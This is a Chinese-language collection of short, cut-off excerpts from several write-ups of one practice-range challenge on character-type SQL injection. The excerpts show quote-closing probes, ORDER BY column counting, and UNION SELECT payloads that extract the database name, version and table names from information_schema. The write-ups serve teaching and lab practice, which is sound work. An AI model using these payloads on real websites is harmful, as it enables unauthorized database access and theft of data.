一进来看到一个停机公告,点开查看 发现链接中有字符参数,怀疑存在字符型注入 输入' and '1'='1 和 ' and '1'='2 测试是否存在注入 ' and '1'='1 ' and '1'='2 发现当输入 'and '1'='2 时,网页发生了错误,确认存在注入。 通过order by 子句判断字段数 order by 1 order by 2 order by 5 ...
id=tingjigonggao123' union select 1,database(),(select table_name from information_schema.tables where table_schema=database() limit 0,1),4 %23 这里还有一种方式就是通过group_concat()函数拉取表数据 ?id=tingjigonggao123' union select 1,2,group_concat(table_name),4 from information_schema...
2.查看当前数据库名和版本 id=' union select '1',database(),version(),'4' --+ 这里命令前面不需要加引号 得到的结果是数据库名为:mozhe_discuz_stormgroup 数据库版本为:10.2.15-MariaDB-log 3.查看当前数据库中的所有表 id=' union select '1',group_concat(table_name),'3','4' from informa...
先尝试了一下在tingjigonggao后面加'号结果发下报错了看这提示应该是sql语句错误 然后尝试了下加上‘ and ’1‘=’1 结果回显是正常的,加上‘ and 1=1 报错说明这里是一个字符型的注入,当然这个靶场的题目也已经提示了这次的sql注入会是一个字符型注入 接下来就是测试字段数了这里我一开始尝试’order by 1...
2.手工注入方法。 是否存在过滤,是否可绕过。 是否可通过页面变化或者时间变化,判断是否存在注入点。 判断注入类型,字符型还是数字型,字符型需要构造闭合。 通过order by 判断列数。 在找到注入点,判断出union 可用的字段后,判断出所用的数据库名字和用户名字,然后再information_schema中查看对应的数据库(table_schema...
该靶场名为字符型SQL注入,首先便应该怀疑ID参数是否为注入点。 尝试更改参数为tingjigonggao' and '1'=1回显同样的通知 尝试更改参数为tingjigonggao' and '1'=2回显报错,如下图所示 通过这个判断,即可确定注入点。 简单SQL注入靶场无非以下几个步骤: ...